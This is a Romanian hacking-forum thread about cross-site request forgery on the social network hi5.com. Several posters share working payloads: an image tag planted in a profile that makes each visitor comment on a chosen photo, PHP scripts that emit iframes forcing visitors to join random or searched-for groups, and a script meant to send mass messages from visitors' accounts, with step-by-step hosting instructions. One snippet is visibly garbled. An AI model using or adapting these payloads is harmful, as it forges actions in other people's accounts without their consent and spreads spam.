Jump to content
Guest Kenpachi

[RST] HI5.com - Vulnerabilitati CSRF [de actualitate]

Recommended Posts

Guest Kenpachi

da dar poate ca eu nu am rugat pe nimeni sa imi faca si apoi sa imi arate cum functioneaza un script ci m'am pus sa invat si sa imi fac eu singur ... ce zici ?

Link to comment
Share on other sites

am incercat chestia asta cu php-ul dar nu stiu daca am facut bine;am deschis notepad-ul si am copiat codul dat de lokipaki dupa care am salvat documentul urmat de .php("titlu.php").am deschis o noua pagina de net iar la adresa am scris destinatia unde am salvat documentul respectiv("titlu.php").Nu stiu daca ceea ce am facut ii bine, dar totusi am incercat :P

Link to comment
Share on other sites

inca una...

intri aici:


[url]http://hi5.com/friend/profile/editBasic.do[/url]

adaugi la "About me" / "Despre mine" :


[img]http://hi5.com/friend/photos/addPhotoComment.do?photoId=numar.fotografie&ownerId=numarul.contului.tau&albumId=numarul.albumului&comment=comentariul pozei[/img]

exemplu:

[img]http://hi5.com/friend/photos/addPhotoComment.do?photoId=548945474&ownerId=65465465&albumId=23423578&comment=comentariul pozei[/img]

De unde luati aceste date ?

intri in albumul in care se afla poza, o selectezi iar apoi vei vedea in browser(sus) :
un link de genul :
[url]http://hi5.com/friend/photos/displayPhotoUser.do?photoId=548945474&ownerId=65465465&albumId=23423578[/url]
si luati datele de acolo.

Ce face ?

Adauga comentariul dorit la poza aleasa (poate fi din albumul tau, sau al altcuiva, al oricui).

Altfel spus cine viziteaza profilul in care este inserat codul, lasa un comentariu la poza dorita. [nici nu stiam ca imi pot comenta singur profilul :lol:]

/testat/

Link to comment
Share on other sites

Loooalleeee!!! :lol:

Cum sa ai j-de mii de vizitatori (cu oleaca de rabdare): scrieti un .php si ii dati refresh cat vreti sau inlocuiti 20 cu ceva mai mare. Nu uitati sa fiti logati in Hi5.

<?

for($i=0;$i<20;$i++)

{ $group=rand(2000000, 3999999);

echo '<iframe src="http://www.hi5.com/friend/group/joinGroup.do?accessCode=&invitorId=&contactId=&friendId=&groupId='.$group.'"></iframe>';

}

?>

si "inversul" care e? adica sa ma sterg din grupurile alea...fara sa le iau la rand =))

Link to comment
Share on other sites

ok nu prea imi omor io timpul cu chesti dastea - adica reply pe subiect ca ajung sa pun intrebari sterile :)) .. - daca un hi5 a fost sters de user .. exista un o posibiltate de recuperare a contului .. si daca mailul cu care a fost facut contul nu ma este recunoscut de baza de dete a hi5 .. mai exista aceasta posibilitate de recuperare ? :| ... presupun ca nu :))

Link to comment
Share on other sites

ok nu prea imi omor io timpul cu chesti dastea - adica reply pe subiect ca ajung sa pun intrebari sterile :)) .. - daca un hi5 a fost sters de user .. exista un o posibiltate de recuperare a contului .. si daca mailul cu care a fost facut contul nu ma este recunoscut de baza de dete a hi5 .. mai exista aceasta posibilitate de recuperare ? :| ... presupun ca nu :))

delete`u de acu e vrajeala :) bifezi ca vrei sa stergi contu si la urmatoarea logare te intreaba daca vrei sa`l reactivezi :D

cand mi l`am sters eu...acu ceva timp, m`am gandit ca`l vreau inapoi. nu puteam sa ma intru pe cont ca si cum n`ar fi buna parola. daca incercam sa fac un cont pe acelasi mail, imi spunea ca trebuie altu (ala e deja inregistrat). le`am trimis mail, le`am zis ca m`am razgandit si`l vreau inapoi...si ei mi l`au reactivat :))

daca nu mai ai mail`u, nu vad cum il recuperezi :P

Link to comment
Share on other sites

@lokipaki

Asa zisul 'grabber' nu pare sa functioneze ... cel putin nu la mine . Am host pe 3x.ro . partea ciudata e ca de cate ori intru pe link IE7 zice 'cannot display this page' dar in adress bar imi apare favico de la hi5 :| .

Am incercat sa modific prin script dar nu am reusit , sunt cam n00b la asa ceva . Totusi am observat ca pana la $count (randurile de jos avand // in fata ) merge perfect si scrie cate grupuri a gasit , dar in rest nimic ...

O sa incerc in continuare sa rezolv , sa ma perfectionez :D

Oricum GoodJob !

/LE:

Dupa cateva tweakuri am reusit :D -- Poate functioneaza si al lui lokipaki dar nu stiu eu sa il folosesc :P --

-I'm not that n00b after all :D

<?php 
if(!$search) $search="abc";
$link="http://www.hi5.com/friend/processBrowseSearch.do?textSearchField=all&restype=groups&name=" .$search. "&page=next&offset=";

$page=file_get_contents($link);
$s=explode('rel="groupsres">Groups <span>(', $page);
$s=explode(')</span></a>', $s[1]);
$count=$s[0];

$grouplist=explode('<h2 class="resultname">[url="http://www.hi5.com/friend/group/' . $groupnumber[0] . '--BagPa--front-html"]' . $groupnumber[0] . '[/url]
';

//cod de test
}



?>

*Am cenzurat :P

Link to comment
Share on other sites

Un mic update ca sa faceti lumea sa se simta mai bine :P

 
<?php
if(!$search) $search="manele";
$link="http://www.hi5.com/friend/processBrowseSearch.do?textSearchField=all&restype=groups&name=" .$search. "&page=next&offset=";

$page=file_get_contents($link);
$s=explode('rel="groupsres">Groups <span>(', $page);
$s=explode(')</span></a>', $s[1]);
$count=$s[0];

$grouplist=explode('<h2 class="resultname"><a title="" href="/friend/group/',$page);



for($j=0; $j<30; $j++)
{ $groupnumber=explode('--', $grouplist[$j+1]);

echo ' <plaintext> [img=http://www.hi5.com/friend/group/joinGroup.do?accessCode=&invitorId=&contactId=&friendId=&groupId='.$groupnumber[0].'] ';

}



?>

Il salvati nume.php , uploadati pe un web server care sa aiba si PHP (eu folosesc 3x.ro ) si apoi accesati www.site.ro/nume.php?search=ceva , scriptul va genera o lista cu linkuri catre 30 de grupuri cu numele 'ceva' sau un nume asemanator .

Lista o copiati in notepad apoi apasati CTRL+H (replace) In FInd what : scrieti <plaintext> si in replace with apasati 1 space . Acest lucru va sterge <plaintext> din lista . Apoi lista o copiati in rubrica About me din hi5 , iar norocosul care va va vizualiza profilul va fi inscris automat in grupurile din lista .

Ca sa fie mai interesant scrieti la ?search 'manele' sau fiti originali :P

-O sa mai imbunatatesc scriptul sa ajut cat mai mult ;) revin maine :)

Link to comment
Share on other sites

am o problema legata de un script care ar trebui sa trimita mesaje la useri de pe hi5.

scriptul este acesta:

<?php
for($i=0;$i<150;$i++)
{ $k=rand(444444444, 555555555);
echo '<iframe src="http://hi5.com/friend/mail/sendMail.do?toIds=F:'.$k.'&subject=subiect&method=send&body=text&timestamp=-8142471507180713907&mailOp=&senderId=&msgId=&submitSend=Send+Message"></iframe>';
}
?>

l-am uploadat pe un site, dar nu merge. primesc o eroare: Sorry, an unexpected error was encountered validating your input. Please try again later.

daca incerc sa folosesc link-ul din codul de mai sus si sa trimit la un singur user, imi apare pagina de compus mesajul, cu subiectul si body-ul pus de mine, dar nu-l trimite.

ma poate ajuta careva?

Multumesc!

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.




×
×
  • Create New...